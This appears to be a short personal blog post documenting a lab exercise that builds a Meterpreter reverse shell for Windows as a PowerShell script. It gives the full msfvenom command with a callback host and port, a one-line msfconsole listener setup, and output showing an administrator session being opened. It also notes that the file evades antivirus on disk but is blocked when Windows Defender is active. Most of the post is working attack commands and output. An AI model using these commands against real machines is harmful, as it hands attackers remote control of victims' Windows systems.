meterpreter reverse shell with powershell

1 Create Shell

root@kali:~/htb# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.178.16 LPORT=443 -f psh -o meterpreter-64.ps1
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of psh file: 3255 bytes
Saved as: meterpreter-64.ps1

2 Setup listener

msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.178.16; set lport 443; set ExitOnSession false; exploit -j"

3. Interact

# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ metasploit v4.17.25-dev ]
+ -- --=[ 1828 exploits - 1033 auxiliary - 318 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

payload => windows/x64/meterpreter/reverse_tcp
lhost => 192.168.178.16
lport => 443
ExitOnSession => false
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.178.16:443 
msf exploit(multi/handler) > [*] Sending stage (206403 bytes) to 192.168.178.10
[*] Meterpreter session 1 opened (192.168.178.16:443 -> 192.168.178.10:53418) at 2018-11-21 14:27:09 -0500

msf exploit(multi/handler) > sessions -l

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows HTB\administrator @ PUCKIE 192.168.178.16:443 -> 192.168.178.10:53418 (192.168.178.10)

4.  if Windows Defender is enabled

PS C:\PENTEST> C:\PENTEST\meterpreter-64.ps1
At C:\PENTEST\meterpreter-64.ps1:1 char:1
+ $VlSIhDyrsor = @"
+ ~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent


PS C:\PENTEST>

5. Summary: The the generated ps1 can be saved to disk, and is not detected as a virus , and runs succesfull creating a shell, but it can’t run with defender enabled on my windows 10 box.

(c)2018 Jacco Straathof

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *